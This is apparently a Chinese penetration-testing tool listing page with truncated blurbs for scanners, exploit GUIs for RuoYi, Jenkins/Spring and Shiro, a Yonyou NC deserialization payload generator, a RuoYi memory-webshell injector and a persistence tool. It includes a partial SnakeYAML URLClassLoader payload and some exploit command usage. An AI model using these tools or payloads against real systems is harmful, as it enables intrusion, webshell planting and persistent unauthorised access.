首页渗透测试列表
  • VscanPlus

    基于veo师傅的漏扫工具vscan二次开发的版本,开源、轻量、快速、跨平台的网站漏洞扫描工具,帮助您快速检测网站安全隐患。功能端口扫描(portscan)指纹识别(fingerprint)漏洞检测(ndaycheck)智能爆破(adminbrute)敏感文件扫描(filefuzz)
  • Code-Audit-DependencyCheck

    简介代码安全组件扫描-DependencyCheck升级版,增加对maven项目pom.xml文件引用的依赖jar进行组件漏洞扫描并输出指定模板样式报告编译环境 java: java-version 1.8 maven: mvn-version >=3.5.0调试用VSCode打开文件夹Code-Audit-DependencyCheck…
  • ruoyi 后台定时任务注入哥斯拉内存马

    yaml-payload-for-ruoyi测试环境ruoyiv4.6.0用法使用mvncleanpackage打包生成jar,或者直接下载release中的jar,放在web路径下ruoyi后台创建定时任务payloadorg.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager[!!java.net.URLClassLoade…
  • 用友NC反序列化漏洞payload生成

    使用说明前言无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。接口检查功能:java-jarnc6.5.jarhttp://127.0.0.1CheckURLDNS构造链探测:java-jarnc6.5.jar…
  • RuoYiExploitGUI_v1.0

    RuoYiExploitGUI_v1.00x01前言​若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具,扫描和漏洞利用结束会自行删除所创建的定时任务。0x02工具使用说明单个检测因为该漏洞为后台任务,所以我们需要配置Cookie请求头,点击设置-->请求头设置-->添加Cookie即可,添加完成即可进行漏洞检测漏洞利用​当定时任务存在SQL注入时,我们可以使用JNDI进行漏洞利用,首先我们…
  • APIKiller-企业API安全保护神

    APIKiller-企业API安全保护神简介 • 架构 • Feature • 食用宝典 • 二次开发文档 • 更新 • 项目社区 • 致谢 项目简介一款高度可定制化的DAST&A…
  • Burp 指纹识别

    攻击过程中,我们通常会用浏览器访问一些资产,可以通过被动指纹识别、网站提取链接指纹识别、常见OA系统弱口令爆破让我们做大做强(捡漏捡漏)。功能如下下述功能会在2024年5月初完成,争取让大家在某行动中能用上。如果有更好的建议都可以留言,只要攻防实用的建议都可以满足你们 浏览器被动指纹识别,已集成Ehole指纹识别库 优化Ehole指纹识别库,区分重点指纹库(OA系统等(常见有d…
  • HackerPermKeeper

    黑客权限保持者___________|||||||__\||//||__||______||________||__)|___________|'/_______________|__|/_`|/__||//_\'__|___/_\'__|'_`_\|
  • Pyke-Shieo:Pyke衍生Shiro反序列化利用工具

    由于其他Shiro工具对复杂请求支持比较差,因此在ShiroAttack基础上编写该Shiro工具,并且从Pyke中拆分出来作为单独工具使用。打包maven:mvnpackageassembly:single 更新记录v0.2(2024-03-07)修复bug:修复批量检测时请求头、请求体信息没带入数据包。 v0.1(2024-03-01)发布初版,实现基本功能。 使…
  • JenkinsExploitGUI_v1.0

    0x01前言​今天复现了几个spring之前的漏洞,顺手就武器化了下,工具目前支持SpringCloudGatewayRCE(CVE-2022-22947)、SpringFrameworkRCE(CVE-2022-22965)的检测以及利用,目前第一个版本,后续会添加更多漏洞POC,以及更多的持久化利用方式0x02工具使用说明个体检测&&批量检测工具支持单个漏洞单个目标检测,也支持多个目标检测漏洞…